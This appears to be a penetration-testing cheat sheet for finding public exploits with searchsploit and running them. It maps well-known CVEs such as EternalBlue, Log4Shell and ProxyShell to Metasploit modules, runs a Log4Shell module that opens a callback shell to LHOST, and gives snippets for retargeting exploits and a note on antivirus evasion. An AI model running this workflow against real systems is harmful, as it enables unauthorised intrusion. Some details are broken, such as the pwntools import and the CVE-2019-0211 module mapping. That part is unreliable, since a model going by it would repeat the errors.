exploit-db

searchsploit Usage Patterns

# Text search in title/path
searchsploit apache 2.4

# Search by CVE
searchsploit --cve CVE-2021-41773
searchsploit --cve CVE-2021-44228

# JSON output for scripting
searchsploit apache --json | python3 -c "
import sys, json
data = json.load(sys.stdin)
for e in data.get('RESULTS_EXPLOIT', []):
    print(e['EDB-ID'], e['Title'], e['Path'])
"

# Copy exploit to working dir
searchsploit -m 50383

# Update database
searchsploit -u

# Search by nmap XML output
searchsploit --nmap nmap_output.xml

# Filter by type (webapps, local, remote, dos)
searchsploit -t "remote" apache

# Search for specific OS
searchsploit windows 10 privilege escalation

# Show only exploits (not shellcodes/papers)
searchsploit wordpress --www-exploit-db

EDB → Metasploit Module Mapping (Top 40 Vulnerabilities)

CVE / EDB-ID	Vulnerability	Metasploit Module	Reliability
CVE-2017-0144 / EDB-41891	MS17-010 EternalBlue	exploit/windows/smb/ms17_010_eternalblue	Weaponized
CVE-2021-44228 / EDB-50592	Log4Shell RCE	exploit/multi/http/log4shell_header_injection	Weaponized
CVE-2021-1675 / EDB-50265	PrintNightmare	exploit/windows/dcerpc/cve_2021_1675_printnightmare	Weaponized
CVE-2021-34473 / EDB-50243	ProxyShell Exchange	exploit/windows/http/exchange_proxyshell_rce	Weaponized
CVE-2020-1472 / EDB-49071	ZeroLogon	auxiliary/admin/dcerpc/cve_2020_1472_zerologon	Weaponized
CVE-2022-22965 / EDB-50798	Spring4Shell	exploit/multi/http/spring_framework_rce_spring4shell	Weaponized
CVE-2019-19781 / EDB-47901	Citrix ADC Path Traversal	exploit/linux/http/citrix_dir_traversal_rce	Weaponized
CVE-2020-5902 / EDB-48695	F5 BIG-IP RCE	exploit/linux/http/f5_bigip_tmui_rce	Weaponized
CVE-2021-26855 / EDB-49637	ProxyLogon Exchange	exploit/windows/http/exchange_proxylogon_rce	Weaponized
CVE-2022-26134 / EDB-51076	Confluence OGNL RCE	exploit/multi/http/atlassian_confluence_namespace_ognl_injection	Weaponized
CVE-2018-13379 / EDB-47288	FortiOS Path Traversal	auxiliary/gather/fortios_vpn_user_cred	Functional
CVE-2022-1388 / EDB-50919	F5 iControl Auth Bypass	exploit/linux/http/f5_icontrol_rce	Weaponized
CVE-2021-20038 / EDB-50882	SonicWall SMA Stack Overflow	exploit/linux/http/sonicwall_sma_overflow	Functional
CVE-2023-46604 / EDB-51880	Apache ActiveMQ RCE	exploit/multi/misc/apache_activemq_rce_cve_2023_46604	Weaponized
CVE-2021-3156 / EDB-49521	Sudo Baron Samedit	exploit/linux/local/sudo_baron_samedit	Weaponized
CVE-2021-4034 / EDB-50689	PwnKit polkit LPE	exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec	Weaponized
CVE-2022-0847 / EDB-50808	Dirty Pipe Linux LPE	exploit/linux/local/cve_2022_0847_dirtypipe	Weaponized
CVE-2016-5195 / EDB-40616	Dirty COW Linux LPE	exploit/linux/local/overlayfs_priv_esc	Weaponized
CVE-2014-6271 / EDB-34766	Shellshock Bash RCE	exploit/multi/http/apache_mod_cgi_bash_env_exec	Weaponized
CVE-2017-5638 / EDB-41570	Apache Struts2 RCE	exploit/multi/http/struts2_content_type_ognl	Weaponized
CVE-2019-0708 / EDB-47416	BlueKeep RDP RCE	exploit/windows/rdp/cve_2019_0708_bluekeep_rce	Functional
CVE-2020-0796 / EDB-48260	SMBGhost RCE	exploit/windows/smb/cve_2020_0796_smbghost	Functional
CVE-2018-7600 / EDB-44449	Drupalgeddon2 RCE	exploit/unix/webapp/drupal_drupalgeddon2	Weaponized
CVE-2019-0211 / EDB-46676	Apache HTTPd LPE	exploit/multi/http/apache_mod_cgi_bash_env_exec	Functional
CVE-2015-1701 / EDB-37367	Windows Win32k LPE	exploit/windows/local/ms15_051_client_copy_image	Weaponized
CVE-2020-14882 / EDB-49391	Oracle WebLogic RCE	exploit/multi/http/oracle_weblogic_admin_handle_rce	Weaponized
CVE-2021-22005 / EDB-50513	vCenter File Upload	exploit/linux/http/vmware_vcenter_uploadova_rce	Weaponized
CVE-2022-41040 / EDB-51917	ProxyNotShell Exchange	exploit/windows/http/exchange_proxynotshell_rce	Functional
CVE-2023-22515 / EDB-51899	Confluence Priv Esc	Manual PoC required	Functional
CVE-2024-21762 / EDB-51960	FortiOS OOB Write	Manual PoC required	Weaponized
CVE-2019-11510 / EDB-47297	Pulse Secure Arb File Read	auxiliary/gather/pulse_secure_file_read	Weaponized
CVE-2020-3452 / EDB-48577	Cisco ASA Path Traversal	auxiliary/gather/cisco_asa_local_file_inclusion	Weaponized
CVE-2021-40539 / EDB-50781	ManageEngine RCE	exploit/multi/http/manageengine_adselfservice_plusrce	Weaponized
CVE-2022-36537 / EDB-51327	ZK Framework RCE	Manual PoC	Functional
CVE-2023-4966 / EDB-51888	Citrix Bleed Session Leak	Manual PoC	Weaponized
CVE-2024-3400 / EDB-52023	PAN-OS GlobalProtect RCE	Manual PoC	Weaponized
CVE-2022-47966 / EDB-51518	ManageEngine SAML RCE	exploit/linux/http/zoho_manageengine_saml_rce	Weaponized
CVE-2023-27997 / EDB-51832	FortiGate SSL-VPN Heap BOF	Manual PoC	Weaponized
CVE-2023-20198 / EDB-51873	Cisco IOS XE Priv Esc	Manual PoC	Weaponized
CVE-2024-6387 / EDB-52098	OpenSSH regreSSHion	Manual PoC (race)	DoS-only

PoC Reliability Rubric

Level	Label	Criteria	Action
1	Weaponized	Works out-of-box against target version, produces shell/access reliably	Test directly; log as CONFIRMED
2	Functional	Requires minor adaptation (change URL, adjust offset)	Modify per target; log as VERIFIED
3	DoS-only	Crashes service but no code exec	Confirm version, log as CONFIRMED-DOS
4	Theoretical	Academic writeup, no working code	Write PoC from paper or skip
5	False/Invalid	Patched, misidentified, or wrong version	Log as NOT-APPLICABLE

Reliability Assessment Checklist:

□ Check affected version range vs target version (confirm match)
□ Read comments/issues on GitHub PoC for known problems
□ Check EDB verified badge (green checkmark = tested by staff)
□ Note compile requirements (libc version, kernel headers, etc.)
□ Test in identical OS/service version lab before live target
□ Check VT multi-scanner on compiled binary (defense evasion consideration)

CVSS 3.1 Tier Quick Reference

Score	Severity	Vector Pattern	Examples
9.0–10.0	CRITICAL	AV:N/AC:L/PR:N/UI:N/S:C	Pre-auth RCE, unauthenticated critical
7.0–8.9	HIGH	AV:N/AC:L/PR:N/UI:N	Auth bypass, post-auth RCE, LPE
4.0–6.9	MEDIUM	AV:N/AC:L/PR:L or AV:L/AC:L	Auth required, info disclosure
0.1–3.9	LOW	AV:L/AC:H/PR:H	Physical access, complex conditions

Common Vector Components:

AV: N(network) L(local) P(physical) A(adjacent)
AC: L(low) H(high)
PR: N(none) L(low) H(high)
UI: N(none) R(required)
S:  U(unchanged) C(changed)
C/I/A: N(none) L(low) H(high)

Pre-built CVSS Vectors by Category:

Pre-auth RCE (critical):    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H  = 9.8
Auth bypass + access:       CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N  = 7.5
Post-auth RCE:              CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H  = 8.8
Local privilege escalation: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H  = 7.8
Stored XSS (admin):        CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N  = 5.4
SQLi (read-only):           CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N  = 6.5
SSRF (internal):            CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N  = 7.2
Path traversal (LFI):       CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N  = 7.5
DoS (network):              CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H  = 7.5
CSRF (state-change):        CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N  = 6.5

searchsploit + Metasploit Workflow

# 1. Find relevant exploits
searchsploit --cve CVE-2021-44228 --json | python3 -m json.tool

# 2. View exploit details before downloading
searchsploit -x exploits/java/webapps/50592.py

# 3. Mirror to current directory
searchsploit -m 50592

# 4. Find matching MSF module
msfconsole -q -x "search cve:2021-44228; exit"

# 5. Run MSF module
msfconsole -q -x "
use exploit/multi/http/log4shell_header_injection
set RHOSTS $TARGET
set RPORT $PORT
set TARGETURI /
set LHOST $LHOST
set LPORT $LPORT
run
exit
"

Common Exploit Modification Patterns

# Pattern 1: Fix URL in raw exploit
import re
code = open('exploit.py').read()
code = re.sub(r'http://[0-9.]+', f'http://{TARGET}', code)

# Pattern 2: Fix shell command in exploit
# Find LHOST/LPORT references and replace with env vars
import os
LHOST = os.environ['LHOST']
LPORT = os.environ['LPORT']

# Pattern 3: Adjust buffer offset for target binary version
# Use cyclic pattern to find EIP/RIP offset
python3 -c "from pwntools import *; print(cyclic(200))" | ./$BINARY
# Then check crash offset with: cyclic_find(b'faab')